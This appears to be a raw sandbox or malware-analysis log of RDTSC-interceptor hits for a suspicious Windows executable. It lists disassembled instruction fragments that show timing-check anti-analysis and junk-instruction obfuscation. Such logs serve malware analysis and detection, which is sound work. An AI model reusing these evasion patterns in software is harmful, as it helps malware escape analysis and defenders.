Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D1095A second address: D1096B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007FDD79156826h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D1096B second address: D1096F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D1096F second address: D10978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D11798 second address: D1179C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D137B0 second address: D137CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD79156837h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D137CB second address: D137E2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FDD78DE46A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007FDD78DE46A6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D137E2 second address: D137E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D14832 second address: D14848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD78DE46B2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D14968 second address: D1498B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007FDD7915682Fh 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007FDD79156826h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D15A13 second address: D15A1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FDD78DE46A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D15B1F second address: D15B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D16BD9 second address: D16BF4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDD78DE46A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FDD78DE46ACh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D16BF4 second address: D16BF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D17B83 second address: D17B89 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D17B89 second address: D17B93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FDD79156826h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D21D66 second address: D21D70 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDD78DE46A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D268F8 second address: D26902 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D26902 second address: D26906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D26B55 second address: B51E1B instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDD79156832h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 78E66A92h 0x00000011 pushad 0x00000012 mov bx, F6F3h 0x00000016 call 00007FDD79156837h 0x0000001b jg 00007FDD79156826h 0x00000021 pop eax 0x00000022 popad 0x00000023 push dword ptr [ebp+122D06B1h] 0x00000029 cld 0x0000002a call dword ptr [ebp+122D1D60h] 0x00000030 pushad 0x00000031 or dword ptr [ebp+122D26A9h], ebx 0x00000037 xor eax, eax 0x00000039 mov dword ptr [ebp+122D193Eh], edi 0x0000003f mov edx, dword ptr [esp+28h] 0x00000043 jbe 00007FDD79156830h 0x00000049 jmp 00007FDD79156839h 0x0000004e mov dword ptr [ebp+122D3AA6h], eax 0x00000054 mov dword ptr [ebp+122D26A9h], esi 0x0000005a jmp 00007FDD79156833h 0x0000005f mov esi, 0000003Ch 0x00000064 jmp 00007FDD79156837h 0x00000069 add esi, dword ptr [esp+24h] 0x0000006d jp 00007FDD7915683Bh 0x00000073 lodsw 0x00000075 jmp 00007FDD79156833h 0x0000007a add eax, dword ptr [esp+24h] 0x0000007e jno 00007FDD7915682Eh 0x00000084 mov ebx, dword ptr [esp+24h] 0x00000088 pushad 0x00000089 mov bh, 19h 0x0000008b pushad 0x0000008c mov dword ptr [ebp+122D2711h], edx 0x00000092 mov ecx, edx 0x00000094 popad 0x00000095 popad 0x00000096 nop 0x00000097 push eax 0x00000098 push edx 0x00000099 jmp 00007FDD79156830h 0x0000009e rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CC3581 second address: CC3587 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CC3587 second address: CC358B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D2AF82 second address: D2AF8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDD78DE46A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D2AF8C second address: D2AF90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D2AF90 second address: D2AFBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FDD78DE46C4h 0x0000000c jng 00007FDD78DE46A6h 0x00000012 jmp 00007FDD78DE46B8h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D2AFBA second address: D2AFE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDD79156835h 0x00000008 jng 00007FDD79156826h 0x0000000e jp 00007FDD79156826h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push edi 0x0000001a pop edi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D2B136 second address: D2B163 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDD78DE46A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007FDD78DE46B9h 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007FDD78DE46A6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D2B2C8 second address: D2B2EA instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDD79156826h 0x00000008 jmp 00007FDD79156838h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D2B2EA second address: D2B336 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDD78DE46ACh 0x00000008 jmp 00007FDD78DE46B9h 0x0000000d jg 00007FDD78DE46A6h 0x00000013 popad 0x00000014 pushad 0x00000015 jne 00007FDD78DE46A6h 0x0000001b jmp 00007FDD78DE46ADh 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 pop eax 0x00000029 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D2B336 second address: D2B33C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D2B33C second address: D2B350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FDD78DE46B2h 0x0000000c jbe 00007FDD78DE46A6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D2B350 second address: D2B354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D2B8B3 second address: D2B8B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D31D3C second address: D31D46 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D31D46 second address: D31D50 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDD78DE46AEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D30788 second address: D3078C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D308D7 second address: D308DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D308DD second address: D308E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D308E6 second address: D308EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D308EC second address: D308F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D308F0 second address: D30927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD78DE46B9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007FDD78DE46AEh 0x00000011 pop esi 0x00000012 jg 00007FDD78DE46ACh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D30A9D second address: D30ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD79156837h 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D30ABC second address: D30AC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D30D6D second address: D30D71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D30D71 second address: D30DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD78DE46B6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnc 00007FDD78DE46B6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D30EFB second address: D30F14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD7915682Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D310B0 second address: D310BA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDD78DE46A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D310BA second address: D310C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D310C3 second address: D310C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D310C9 second address: D310DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push ebx 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D310DA second address: D310F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD78DE46B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D3122C second address: D31239 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FDD79156826h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D31239 second address: D3123F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D3123F second address: D3125D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jo 00007FDD79156826h 0x0000000c jg 00007FDD79156826h 0x00000012 jmp 00007FDD7915682Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D316C8 second address: D316D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D316D3 second address: D316F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD7915682Bh 0x00000007 jmp 00007FDD79156830h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D316F6 second address: D316FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CE7032 second address: CE703D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: CE703D second address: CE704B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FDD78DE46ACh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D31BEF second address: D31BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D34EC4 second address: D34EC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D34EC8 second address: D34F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDD79156826h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007FDD7915682Ch 0x00000012 pop edi 0x00000013 pushad 0x00000014 jmp 00007FDD79156839h 0x00000019 jmp 00007FDD7915682Dh 0x0000001e pushad 0x0000001f ja 00007FDD79156826h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D3D76C second address: D3D79C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 js 00007FDD78DE46A6h 0x0000000f jmp 00007FDD78DE46B6h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jnc 00007FDD78DE46A6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D3C478 second address: D3C4A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FDD79156826h 0x0000000a jmp 00007FDD79156836h 0x0000000f popad 0x00000010 jmp 00007FDD7915682Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D3C4A5 second address: D3C4D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD78DE46B3h 0x00000007 jnp 00007FDD78DE46BEh 0x0000000d jmp 00007FDD78DE46B2h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D3C0FF second address: D3C109 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FDD79156826h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D3C109 second address: D3C10D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D3D001 second address: D3D01D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FDD79156835h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D3D01D second address: D3D024 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D3D1AD second address: D3D1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FDD7915682Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D3D1C5 second address: D3D1C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D048E5 second address: CE64E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 jo 00007FDD7915682Ch 0x0000000f mov dword ptr [ebp+122D2751h], edx 0x00000015 lea eax, dword ptr [ebp+1248666Ch] 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007FDD79156828h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 00000018h 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 pushad 0x00000036 jp 00007FDD7915682Ch 0x0000003c mov ecx, dword ptr [ebp+122D396Ah] 0x00000042 popad 0x00000043 nop 0x00000044 jmp 00007FDD79156837h 0x00000049 push eax 0x0000004a jp 00007FDD7915682Ah 0x00000050 nop 0x00000051 push 00000000h 0x00000053 push ebx 0x00000054 call 00007FDD79156828h 0x00000059 pop ebx 0x0000005a mov dword ptr [esp+04h], ebx 0x0000005e add dword ptr [esp+04h], 00000016h 0x00000066 inc ebx 0x00000067 push ebx 0x00000068 ret 0x00000069 pop ebx 0x0000006a ret 0x0000006b sbb dx, C61Bh 0x00000070 call dword ptr [ebp+122D5B00h] 0x00000076 push ecx 0x00000077 push edi 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D04A0D second address: D04A28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD78DE46B7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D04E3A second address: D04E44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FDD79156826h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D04E44 second address: D04E52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D04E52 second address: D04E64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD7915682Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D04E64 second address: B51E1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FDD78DE46A6h 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d sub dword ptr [ebp+1245FC85h], ecx 0x00000013 push dword ptr [ebp+122D06B1h] 0x00000019 call 00007FDD78DE46ACh 0x0000001e adc dh, 0000000Dh 0x00000021 pop edi 0x00000022 call dword ptr [ebp+122D1D60h] 0x00000028 pushad 0x00000029 or dword ptr [ebp+122D26A9h], ebx 0x0000002f xor eax, eax 0x00000031 mov dword ptr [ebp+122D193Eh], edi 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b jbe 00007FDD78DE46B0h 0x00000041 jmp 00007FDD78DE46B9h 0x00000046 mov dword ptr [ebp+122D3AA6h], eax 0x0000004c mov dword ptr [ebp+122D26A9h], esi 0x00000052 jmp 00007FDD78DE46B3h 0x00000057 mov esi, 0000003Ch 0x0000005c jmp 00007FDD78DE46B7h 0x00000061 add esi, dword ptr [esp+24h] 0x00000065 jp 00007FDD78DE46BBh 0x0000006b lodsw 0x0000006d jmp 00007FDD78DE46B3h 0x00000072 add eax, dword ptr [esp+24h] 0x00000076 jno 00007FDD78DE46AEh 0x0000007c mov ebx, dword ptr [esp+24h] 0x00000080 pushad 0x00000081 mov bh, 19h 0x00000083 pushad 0x00000084 mov dword ptr [ebp+122D2711h], edx 0x0000008a mov ecx, edx 0x0000008c popad 0x0000008d popad 0x0000008e nop 0x0000008f push eax 0x00000090 push edx 0x00000091 jmp 00007FDD78DE46B0h 0x00000096 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D057A2 second address: D057A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D057A6 second address: D057AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D057AC second address: D05819 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD79156838h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c clc 0x0000000d mov dword ptr [ebp+122D2A44h], eax 0x00000013 push 0000001Eh 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FDD79156828h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov ecx, dword ptr [ebp+122D2B3Eh] 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FDD79156835h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D05819 second address: D0581F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D0593C second address: D05940 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\OoYYtngD7d.exe	RDTSC instruction interceptor: First address: D05940 second address: D05946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
